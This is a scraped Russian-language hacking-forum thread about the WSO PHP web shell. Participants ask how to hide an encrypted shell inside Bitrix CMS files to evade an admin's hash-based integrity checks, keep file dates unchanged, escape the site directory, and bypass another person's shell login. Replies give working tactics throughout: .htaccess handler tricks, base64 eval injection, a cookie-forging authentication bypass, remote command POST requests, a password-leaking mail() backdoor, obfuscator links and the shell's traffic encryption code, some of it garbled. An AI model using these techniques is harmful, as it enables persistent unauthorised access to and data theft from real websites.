как внедрить wso - который зашифрован и система на него не сигнализирует в файлы cms ?

админ сайта на bitrix использует скрипт который делает md5 хеши всех файлов, показывает появление любых новых файлов, удаление файлов и редактирование.

все загруженые шеллы были удалены, даже загружал в картинке, её тоже

но заметил когда внес тестовую правку - добавил iframe, который был просто зашифрована в base 64 в файл, и он остался нетронутым

можно ли шелл залить в какой либо файл, который удалить он не сможет тк из за него перестанет cms работать, и как выполнить шелл в рабочем файле cms, ведь прямым обращением может вызываться файл cms ?

↑ (https://antichat.live/posts/3898816/)
как внедрить wso - который зашифрован и система на него не сигнализирует в файлы cms ?
админ сайта на bitrix использует скрипт который делает md5 хеши всех файлов, показывает появление любых новых файлов, удаление файлов и редактирование.
все загруженые шеллы были удалены, даже загружал в картинке, её тоже
но заметил когда внес тестовую правку - добавил iframe, который был просто зашифрована в base 64 в файл, и он остался нетронутым
можно ли шелл залить в какой либо файл, который удалить он не сможет тк из за него перестанет cms работать, и как выполнить шелл в рабочем файле cms, ведь прямым обращением может вызываться файл cms ?


и причем надо размер файла чтоб не менялся - тоесть даже если делать фрейм то удалять надо такое же количество строк и т.п.

я хочу опробовать разместить в файле, размер его не сильно увеличится, подумываю что админ не сильно разбирается и вырезать из кода шелл не повредив файл затруднит его

по крайней мере нужно проверить на практике

если админ не сильно разбирается, то можно часть кода самой CMS зашифровать вместе с шеллом, в результате при сносе шифрованного участка с шелом, сносится и часть кода CMS в результате чего упадет сайт, бональная альтернатива заменить орегинальным файлом сайта

dondy (https://antichat.live/members/265505/), если проверка файлов по маске, то можно в .htaccess

AddType application/x-httpd-php .mp4 .etc

и шелл со своим расширением

или в файл eval/include с base64, накрайняк код пихнуть типа function bitrix_secure_code(...){...} и по кукам юзать т.е. в существующую ф-ию добавить ф-ию и ещё раз в другую ф-ию ф-ию + запутать проверками типа if (isset($bla)) и добавив else {die("Hacking attempt");} - вырежит - система перестанет работать.

Подскажите пожалуйста. Не могу понять как в нем искать по содержимому файлов?

всем привет!

такой вопрос есть ли возможность в wso 2.5 возможность слить структуру сайта ?

пробовал zip архив создать но видимо на сервере не стоит архиватор*((

↑ (https://antichat.live/posts/3903957/)
всем привет!
такой вопрос есть ли возможность в wso 2.5 возможность слить структуру сайта ?
пробовал zip архив создать но видимо на сервере не стоит архиватор*((


Чтоб не стоял ZIP? Бред! что то вы не так делайте!

↑ (https://antichat.live/posts/3904072/)
Чтоб не стоял ZIP? Бред! что то вы не так делайте!


zip может и не стоять


↑ (https://antichat.live/posts/3903957/)
всем привет!
такой вопрос есть ли возможность в wso 2.5 возможность слить структуру сайта ?
пробовал zip архив создать но видимо на сервере не стоит архиватор*((


а tar?

↑ (https://antichat.live/posts/3904082/)
zip может и не стоять
а tar?


оба формата есть но когда типа архивирую ничего не происходит!

Добрый день,

поставил wso2 на хостинг, выделил файлы и папки, нажал снизу compress (zip) вылезло рядом имя архива, нажал возле него на две стрелочки >> все дальше ничего. как архивнуть и качнуть все файлы?

как скачать сайт?

↑ (https://antichat.live/posts/3915299/)
Добрый день,
поставил wso2 на хостинг, выделил файлы и папки, нажал снизу compress (zip) вылезло рядом имя архива, нажал возле него на две стрелочки >> все дальше ничего. как архивнуть и качнуть все файлы?
как скачать сайт?


Читайте пост /threads/103155/page-21#post-3830460 (https://antichat.live/threads/103155/page-21/)

можно ли заставить wso не менять дату правки файла ? то есть если внести изменение в какой то файл на хостинге через wso, то дата не изменится на текущую - а останется та, которая была до правки файла ?

↑ (https://antichat.live/posts/3915333/)
можно ли заставить wso не менять дату правки файла ?


А тачнуть не судьба или руки не позволяют? https://ru.wikipedia.org/wiki/Touch

↑ (https://antichat.live/posts/3915333/)
можно ли заставить wso не менять дату правки файла ? то есть если внести изменение в какой то файл на хостинге через wso, то дата не изменится на текущую - а останется та, которая была до правки файла ?


wso по умолчанию не меняет дату последнего редактирования файла - если конечно вы редактируете уже существующий на сервере файл. но если загрузить или создать новый файл средствами wso то разумеется в качестве даты последнего изменения файла будет указана дата когда его загрузили\создали. в последнем случае также изменится дата у папки в которой был создан файл

Как с помощью WSO сделать гет запрос на сторонний сайт?

↑ (https://antichat.live/posts/3928764/)
Как с помощью WSO сделать гет запрос на сторонний сайт?


В смысле?

↑ (https://antichat.live/posts/3928764/)
Как с помощью WSO сделать гет запрос на сторонний сайт?


[ Php] =>


echofile_get_contents('http://site/?get_param=123');

↑ (https://antichat.live/posts/3929943/)
[ Php] =>

echofile_get_contents('http://site/?get_param=123');



Лучше тогда прокси, в интернете куча примеров.

Или вообще анонимайзер

как через shell выйти за пределы директории папок сайта ?

на денвере тестировал и получалось такое сделать

на хостинге - по крайней мере где испытывал нет.

какие опции и блокировки хостинга на это влияют ?

↑ (https://antichat.live/posts/3951592/)
какие опции и блокировки хостинга на это влияют ?


OPEN_BASE_DIR, DISABLE_FUNCTION, права на папки


↑ (https://antichat.live/posts/3951592/)
как через shell выйти за пределы директории папок сайта ?


Может эта статейка как нить вам поможет? /threads/397144/ (https://antichat.live/threads/397144/)

↑ (https://antichat.live/posts/3951592/)
как через shell выйти за пределы директории папок сайта ?
на денвере тестировал и получалось такое сделать
на хостинге - по крайней мере где испытывал нет.
какие опции и блокировки хостинга на это влияют ?


типа хотел залив на один сайт взломать весь сервер ?)

Так впринципе можно если хостинг конченый или сайт на свой пк ставили через денвер и права не установили

Добрый вечер!

А почему браузер ругается на сайт программы - "Ваше подключение не защищено

"Злоумышленники могут пытаться похитить ваши данные с сайта rdot.org (например, пароли, сообщения или номера банковских карт). NET::ERR_CERT_AUTHORITY_INVALID"

Как безопасно заходить на подобные сайты? И чем в худшем случае мне может грозить посещение подобных сайтов?

Спасибо.

↑ (https://antichat.live/posts/3959928/)
Добрый вечер!
А почему браузер ругается на сайт программы - "Ваше подключение не защищено
"Злоумышленники могут пытаться похитить ваши данные с сайта rdot.org (например, пароли, сообщения или номера банковских карт). NET::ERR_CERT_AUTHORITY_INVALID"
Как безопасно заходить на подобные сайты? И чем в худшем случае мне может грозить посещение подобных сайтов?
Спасибо.


http://nastroisam.ru/connect-not-secure-chrome/

Сертификат у них устарел походу. Грозить может тем ,что перехватить можно пасс логин при входе на сайт, если кто-то будет снифать в одной сети. (http://nastroisam.ru/connect-not-secure-chrome/)

↑ (https://antichat.live/posts/3959932/)
http://nastroisam.ru/connect-not-secure-chrome/
Сертификат у них устарел походу. Грозить может тем ,что перехватить можно пасс логин при входе на сайт, если кто-то будет снифать в одной сети. (http://nastroisam.ru/connect-not-secure-chrome/)


у них самозаверенный сертификат

Почему-то на винде в всо не выполняется такой код:


error_reporting(E_ALL);
//$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']);
$startDir = str_replace('\\', '/', dirname(__FILE__));
//$startDir = 'C:/xampp/htdocs';
echo $startDir;
$starSearch = substr($startDir, 0, strpos($startDir,'/')+1);
$dirs_parts = explode('/', $startDir);
print_r($dirs_parts);
//exit();
//echo $starSearch."\n";
$currDir = $starSearch;
$i = 1;
$k = 0;
$max_iter = 255;
$flag = true;
do {
if ($k >= $max_iter){
break;
}
echo $currDir."\n";
//sleep(1);
$cd = $currDir;
$ds = scandir($cd);
print_r($ds);
$currDir = rtrim($currDir,'/');
if($currDir == $startDir ){
$flag = false;
break;
}
$currDir .= '/';
$currDir .= $dirs_parts[$i];
$i++;
$k++;

} while ( $flag );

Довольно странно, если закомментить print_r($ds);то он вроде выполняется. Шелл у меня не оригинальный а какой-то обфусцированный. Но что вообще может мешать исполнению? Причем это происходит когда в пути есть конкретная папка, у меня это /addons/test.ru. Когда нужно прочитать папку addons скрипт перестает работать. В чем может быть дело?

upd: Вроде бы нашел причину - если в именах файлов есть кириллические символы, то ничего выводиться не будет. Осталось только понять как решить.

Приветствую Всех.

Респект автору за данное чудо

Киньте ктонить ссыль на последнию версию, пожалуйста, и подскажите еще один момент, чем его лучше криптануть, чтоб не палился?

↑ (https://antichat.live/posts/3976296/)
Приветствую Всех.
Респект автору за данное чудо
Киньте ктонить ссыль на последнию версию, пожалуйста, и подскажите еще один момент, чем его лучше криптануть, чтоб не палился?


http://kronus.me/cn/wso-builder/1.04/

http://krober.biz/misc/obfuscator.php

[QUOTE="palec2006"]
↑ (https://antichat.live/posts/3983998/)
дяденьки, подскажите что за хрень, на некоторых хостингах в режиме редактирования файлов теряется часть кода файла, вот например так:
[CODE]
...

после загрузки на сайт сменилось имя и расширение на "xql_-2.x-php" и соответсвенно при переходе на wso вместо исполнения php на страничке отображается код шелла. это можно как то обойти?

↑ (https://antichat.live/posts/4003749/)
после загрузки на сайт сменилось имя и расширение на "xql_-2.x-php" и соответсвенно при переходе на wso вместо исполнения php на страничке отображается код шелла. это можно как то обойти?


1) загрузить .htaccess

2) если не прокатит, то заюзать расширения xlsx, docx, 7z (как пример 1..php..7z)

3) инклудить

https://github.com/HARDLINUX/webshell/blob/master/WSO.php

В какой кодировке открывать это?

$▘ = true;

Вот такая фигня отображается

а возможно ли как то через wso создать базу данных? CREATE DATABASE test , выдаёт Error: Access denied for user

↑ (https://antichat.live/posts/4017882/)
а возможно ли как то через wso создать базу данных? CREATE DATABASE test , выдаёт
Error:
Access denied for user


а wso тут не при чём, у mysql пользователя должны быть привилегии на создание базы

Автор спасибо!

Всем привет!

Коллеги, подскажите - у WSO есть API режим?

зная урл и доступ, нужно запускать удалённо php скрипт - это возможно?

↑ (https://antichat.live/posts/4026412/)
Всем привет!
Коллеги, подскажите - у WSO есть API режим?
зная урл и доступ, нужно запускать удалённо php скрипт - это возможно?


То что вам нужно, называется бегдор, все просто делается! и API тут не причем!

↑ (https://antichat.live/posts/4026427/)
То что вам нужно, называется бегдор, все просто делается! и API тут не причем!


Спасибо за разъяснение, буду знать.

Можно чуть подробнее объяснить как на конкретной задаче этот бегдор использовать?

Например, есть у меня 100 адресов WSO

Хочу запустить там допустим phpinfo(); и результат кинуть на мыло.

Скрипт запуска и отправки есть - как его "скормить" для удалённого выполнение WSO ?

пост запросом как вариант отправляем:

a=Php&c=&p1=phpinfo%28%29%3B&p2=&p3=&charset=Windows-1251&pass=root

а там парсем результат и отправляем куда надо

собственно, вопрос как раз был о том, чтобы не парсить

думал, может есть более удобный инструмент для удалённого запуска PHP скриптов

↑ (https://antichat.live/posts/4026452/)
собственно, вопрос как раз был о том, чтобы не парсить
думал, может есть более удобный инструмент для удалённого запуска PHP скриптов


Впринцепи я вам четко ответил по вашему вопросу, а дальше думайте сами как хотите....

Да, спасибо - регулярка элементарная.

Именно этот вариант сейчас в работе.


....

подскажите пожалуйста

есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?

↑ (https://antichat.live/posts/4031665/)
подскажите пожалуйста
есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?


Узнать пас не получится, попробуй побрутить доступ к шелу по стандартным словарям, либо проверь сайт на известные уязвимости. Если шел до сих пор там, значит и уязвимости актуальны.

Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?

↑ (https://antichat.live/posts/4041691/)
Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?


В чистом WSO нет такого. Функция может делать что угодно, но точно ничего путного. Возможно ифреймер.

↑ (https://antichat.live/posts/4041691/)
Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?


Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!

↑ (https://antichat.live/posts/4042463/)
Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!


Уже узнал! она ищет .php файлы которые можно изменить, и выводит список с именами.

↑ (https://antichat.live/posts/4031665/)
подскажите пожалуйста
есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?


Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла

↑ (https://antichat.live/posts/4089326/)
Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла


Ну так полагаю, что T.C не знает хэша, а вообще, при наличие хэша не обязательно его брутить!!!

Давайте посмотрим в сторону кода самого шела как происходит авторизация:


$auth_pass="63a9f0ea7bb98050796b649e85481845";//пусть условно будет парол ь root

//..........

if(!empty($auth_pass)) {//если присутствует пароль
if(isset($_POST['pass']) && (md5($_POST['pass']) ==$auth_pass))// и пароль равен его хэшь сумме
WSOsetcookie(md5($_SERVER['HTTP_HOST']),$auth_pass);// отправляем куку с параме тром хэшь хоста и значени ем хэшь пароля

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] !=$auth_pass))
wsoLogin();
}

предположим что у нас HOST: localhost

тогда нам для авторизации, при известном хэше, достаточно будет вставить куку:

421aa90e079fa326b6494f812ad13e79=63a9f0ea7bb980507 96b649e85481845

↑ (https://antichat.live/posts/4041842/)
В чистом WSO нет такого. Функция может делать что угодно, но точно ничего путного. Возможно ифреймер.


https://github.com/tennc/webshell/tree/master/php/wso

↑ (https://antichat.live/posts/4090336/)
https://github.com/tennc/webshell/tree/master/php/wso


Ну да, только стучалка там есть =(

↑ (https://antichat.live/posts/4164139/)
Ну да, только стучалка там есть =(


__tps://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php


if(array_key_exists('watching',$_POST)){
$tmp=$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru','root',$tmp);// Edit or delete!
}


Стучалку и вырезать можно!

thnks for this

↑ (https://antichat.live/posts/4164248/)
__tps://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php

if(array_key_exists('watching',$_POST)){
$tmp=$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru','root',$tmp);// Edit or delete!
}


Стучалку и вырезать можно!


Можно, только остается вопрос каких еще сурпрайзов ждать от этого WSO=((( А так красивый.

. . .
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION','2.6');
if(get_magic_quotes_gpc()) {
functionWSOstripslashes($array) {
returnis_array($array) ?array_map('WSOstripslashe s',$array) :stripslashes($array);
}
$_POST=WSOstripslashes($_POST);
}
functionwsoLogin() {
die("Not Found
The requested URL was not found on this se rver.
Additionally, a 404 Not Found error was enc ountered while trying to use an ErrorDocumen t to handle the request.

Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80

input { margin:0;background-color:#fff;border:1px solid #fff; }

");
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) ==$auth_pass) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] =true;
else
wsoLogin();
if(strtolower(substr(PHP_OS,0,3)) =="win")
$os='win';
else
$os='nix'; . . .

А возможно ли как то авторизоваться при таком методе авторизации зная лишь md5 исходного пароля $auth_pass ??? Я так понял что нельзя, ну на всякий решил спросить, чем чёрт не шутит.

↑ (https://antichat.live/posts/4186982/)

. . .
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION','2.6');
if(get_magic_quotes_gpc()) {
functionWSOstripslashes($array) {
returnis_array($array) ?array_map('WSOstripslashe s',$array) :stripslashes($array);
}
$_POST=WSOstripslashes($_POST);
}
functionwsoLogin() {
die("Not Found
The requested URL was not found on this se rver.
Additionally, a 404 Not Found error was enc ountered while trying to use an ErrorDocumen t to handle the request.

Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80

input { margin:0;background-color:#fff;border:1px solid #fff; }

");
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) ==$auth_pass) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] =true;
else
wsoLogin();
if(strtolower(substr(PHP_OS,0,3)) =="win")
$os='win';
else
$os='nix'; . . .

А возможно ли как то авторизоваться при таком методе авторизации зная лишь md5 исходного пароля
$auth_pass ???
Я так понял что нельзя, ну на всякий решил спросить, чем чёрт не шутит.


Возможно (скорее всего) ...

так наивно впихнули стучалку )

Классная стучалка, правда $_SERVER['SERVER_NAME'] может содержать не домен а мусор но то все фигня.

Народ а почему в zip или tar не упаковываются файлы, ничего не происходит, архив не создаётся?

↑ (https://antichat.live/posts/4266099/)
Народ а почему в zip или tar не упаковываются файлы, ничего не происходит, архив не создаётся?


PHP скомпайлили/стартовали без поддержки архивов / php-модули для архивов не установлены (php-zip) / или же нет прав на запись.

Посмотрите phpinfo чего не хватает.

Ребята, такая проблема пытаюсь приконектится к БД, но ничего не получается http://prntscr.com/nr5nyc, такое в 90% случаев, если беру другой шелл, там все ок. Но другой меня не устраивает во всем остальном, нужен именно ВСО. Кто-нибудь знает, в чем может быть проблема и как это пофиксить?

↑ (https://antichat.live/posts/4308176/)
Ребята, такая проблема пытаюсь приконектится к БД, но ничего не получается
http://prntscr.com/nr5nyc
, такое в 90% случаев, если беру другой шелл, там все ок. Но другой меня не устраивает во всем остальном, нужен именно ВСО. Кто-нибудь знает, в чем может быть проблема и как это пофиксить?


Так в чём ошибка то?

https://www.php.net/manual/ru/function.mysql-query.php


function query($str) {
switch($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}



Внимание
Данное расширение устарело, начиная с версии PHP 5.5.0, и удалено в PHP 7.0.0. Используйте вместо него
MySQLi (https://www.php.net/manual/ru/book.mysqli.php)
или
PDO_MySQL (https://www.php.net/manual/ru/ref.pdo-mysql.php)
. Смотрите также инструкцию
MySQL: выбор API (https://www.php.net/manual/ru/mysqlinfo.api.choosing.php)
и
соответствующий FAQ (https://www.php.net/manual/ru/faq.databases.php#faq.databases.mysql.deprecated)
для получения более подробной информации. Альтернативы для данной функции:

mysqli_query() (https://www.php.net/manual/ru/mysqli.query.php)

PDO::query() (https://www.php.net/manual/ru/pdo.query.php)

oRb (https://antichat.live/members/55864/) ты еще живой?

↑ (https://antichat.live/posts/4308439/)
oRb (https://antichat.live/members/55864/)
ты еще живой?


Живой!!! но в других темах...

P.S: Сами патчити!

Новый wso 3 дня назад вышел

https://github.com/twepl/wso

↑ (https://antichat.live/posts/4376519/)
ребят, подскажите пожалуйста:
- если управлять шеллом через GET POST запросы, то в WSO 2.5 через Fiddler можно нормально отследить передаваемые данные
проблема в том, что WSO 2.5 морально устарел и на многих пыхах частенько не открывается
приходится юзать WSO 4.2.5
но WSO 4.2.5 при тех же запросах кодирует данные
допустим слово "FilesMan" - "CwApCRQcJXoXA31K"
и уже просто так отправить запрос не получается
нужно передаваемые данные закодировать
как кодируются данные в WSO 4.2.5?
пример WSO 4.2.5
https://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php
подскажите плз
заранее благодарен


Вот функция разшифровки:


function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=b ase64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i=strlen($str))break;}}return base64_decode($enc_str);}

А вот шифрование

[CODE]
function encrypt(str,pwd){if(pwd==null||pwd.length=str.leng th)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl =string.length;for(var n=0;n127&&c1>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+= enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}retur n utftext;}
function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCod eAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeA t(i++);bits=o1>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64. charAt(h4);}while(i

[QUOTE="fandor9"]
↑ (https://antichat.live/posts/4376534/)
Вот функция разшифровки:

function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=b ase64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i=strlen($str))break;}}return base64_decode($enc_str);}

А вот шифрование

function encrypt(str,pwd){if(pwd==null||pwd.length=str.leng th)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl =string.length;for(var n=0;n127&&c1>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+= enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}retur n utftext;}
function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCod eAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeA t(i++);bits=o1>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64. charAt(h4);}while(i=strlen($str))break;}}return base64_decode($enc_str);}

А вот шифрование
[CODE]
function encrypt(str,pwd){if(pwd==null||pwd.length=str.leng th)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl =string.length;for(var n=0;n127&&c1>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+= enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}retur n utftext;}
function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCod eAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeA t(i++);bits=o1>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64. charAt(h4);}while(i

↑ (https://antichat.live/posts/4383234/)
а зачем такая заморочка при автоматизации работы с новыми шелами?
560c6f5b685947113ec71a03d59277fb 21232f297a57a5a743894a0e4a801fc3 /wp-content/uploads/2020/04/1/
560c6f5b685947113ec71a03d59277fbkey bc5bf2385512f2fbb9c7481bce116923 /wp-content/uploads/2020/04/
560c6f5b685947113ec71a03d59277fb 188162e90b88271030885b3bd7cfd523 /wp-content/uploads/2020/04/
a=CwAhQgM1FywvSF5CLSN4RA%3D%3D&
c=FV8lRzs6DA8sLR9dLGY9ETstHxs6JR9cOz0PWhd2Llk7ZSIO KWcYQRRYdEg9KhtEPS5gSC49H0cXAxcDFhADGhQHCEMUPjJGAh d%2BVA%3D%3D&
p1=PSobAQM1CxUBFCVeLRV4RA%3D%3D&p2=Ozo5XDg6IRU%3D&
p3=&
charset=UTF-8
вот первые строки с куками и данные которые шифруются как понять ключ в куках?


Ключ в куках : 560c6f5b685947113ec71a03d59277fbkey имеет значение bc5bf2385512f2fbb9c7481bce116923.

Вот вам функция расшифровке в JS


function decrypt(cipher,pwd){
key = btoa(pwd);
console.log("Key="+key+" length="+key.length);
str_cipher = atob(unescape(cipher));
console.log("Encrypted string = "+str_cipher+" length="+str_cipher.length);
enc_chr = "";
enc_str="";
i=0;
while(i str_cipher.length){
console.log("True");break;
}
}
}
return atob(enc_str);
}

тоесть что-бы расшифровать значение а, передаёте


decrypt("CwAhQgM1FywvSF5CLSN4RA%3D%3D","bc5bf2385512f2fbb9c7481bce116923")

и получаете "FilesTools".

а = "FilesTools"

c="/home/ileolahe/public_html/wp-content/uploads/2020/04/1/"

p1="tetete.php"

p2="mkfile"

Спасибо большое. а кодирование данных если есть и не трудно опишите пожалуйста. JS начал разбирать чтоб переписать под свой язык. вашу функцию декодирования вроде разберу а кодирование бы еще.

↑ (https://antichat.live/posts/4383506/)
Спасибо большое. а кодирование данных если есть и не трудно опишите пожалуйста. JS начал разбирать чтоб переписать под свой язык. вашу функцию декодирования вроде разберу а кодирование бы еще.


так функция encrypt вот (https://antichat.com/threads/103155/page-28#post-4376534).

Доброго всем. В одном из сообщении выше, давали ссылку на wso билдер.


http://kronus.me/cn/wso-builder/1.04/

Сайт лёг. У кого остался скрипт, просьба поделиться.